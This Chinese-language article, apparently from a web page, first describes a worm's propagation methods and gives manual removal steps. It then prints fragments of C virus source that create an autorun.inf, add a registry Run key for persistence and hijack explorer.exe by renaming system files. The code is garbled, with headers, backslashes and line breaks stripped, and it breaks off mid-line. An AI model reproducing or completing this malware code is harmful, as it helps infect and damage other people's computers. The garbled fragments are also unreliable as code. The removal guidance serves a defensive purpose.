通过多种方式进行传播，几乎包括目前所有流行病毒的传播手段： 通过email将自己发送出去； 搜索局域网内共享网络资源； 将病毒文件复制到没有打补丁的微软（NT/2000）IIS服务器； 感染本地文件和远程网络共享文件； 感染浏览的网页；,该病毒降低系统资源，可能最后导致系统运行变慢最后宕机；它改变安全设置，在网络中共享被感染机器的硬盘，导致泄密；它不断的发送带毒邮件。,查杀方法：,1、打开进程管理器，查看进程列表； 2、结束其中进程名称为“xxx.tmp.exe”以及“Load.exe”的进程（其中xxx为任意文件名）； 3、切换到系统的TEMP目录，寻找文件长度为57344的文件，删掉它们； 4、切换到系统的System目录，寻找名称为Riched20.DLL的文件； 5、查看Riched20.DLL的文件大小，系统的正常文件大小应该在100K以上，而Concept病毒的副本大小为57344字节，如果有长度为57344字节的Riched20.DLL，删掉它；,6、继续在系统的System目录下寻找名称为load.exe、长度为57344字节的文件，删掉它； 7、在C:、D:、E:三个逻辑盘的根目录下寻找Admin.DLL文件，如果在根目录下存在该文件，则删除它； 8、打开System.ini文件，在load中如果有一行“shell=explorer.exe load.exe -dontrunold”，则改为“shell=explorer.exe”； 9、如果是WinNT或者Win2000以及WinXP系统，则打开“控制面板|用户和密码”，将Administrator组中的guest帐号删除； 10、打开共享文件夹管理，将共享“C$”去除，该共享为本地C:的完全共享；,Part3 代码展示,举例：part1,#include /*标准输入输出*/ #include /*字符串操作*/ #include /*其它函数*/ #include /*进程控制*/ #include /*目录函数*/ #define SVCHOST_NUM 6 /*关键位置病毒复制数量*/ #define RUBBISH_NUM 5 /*垃圾文件数量*/ #define REMOVE_NUM 5 /*删除文件数*/ /*=*/ /* 文件AUTORUN.INF内容： 1.自动运行SVCHOST.com 2.覆盖默认打开命令，使用病毒体作为新的打开方式 3.覆盖默认资源管理器命令，使病毒体作为新的命令方式 */ char *autorun=“AutoRunnopen=“SVCHOST.com /s“nshellopen=打开( /*=*/,举例：part2,/* 添加注册表项： 1.自动运行生成病毒体C: */ char *regadd=“REGEDIT4nn HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunn“wjview32 “=“C: /s“; /*=*/ /* 函数：复制文件 复制源：infile 目的地：outfile 成功返回0，失败返回1 */ int copy(char *infile,char *outfile) FILE *input,*output; char temp; if(strcmp(infile,outfile)!=0 /*=*/,举例：part3,/* 函数：通过explorer自动运行 成功返回0，失败返回1,2 */ int autorun_explorer() FILE *input; if(input=fopen(“c:windowssystemexplorer.exe“,“rb“)!=NULL) fclose(input); remove(“c:windows$temp$“); remove(“c:windowssystem32dllcache$temp$“); return 1; copy(“c:windowsexplorer.exe“,“c:windowssystemexplorer.exe“); rename(“c:windowsexplorer.exe“,“c:windows$temp$“); rename(“c:windowssystem32dllcacheexplore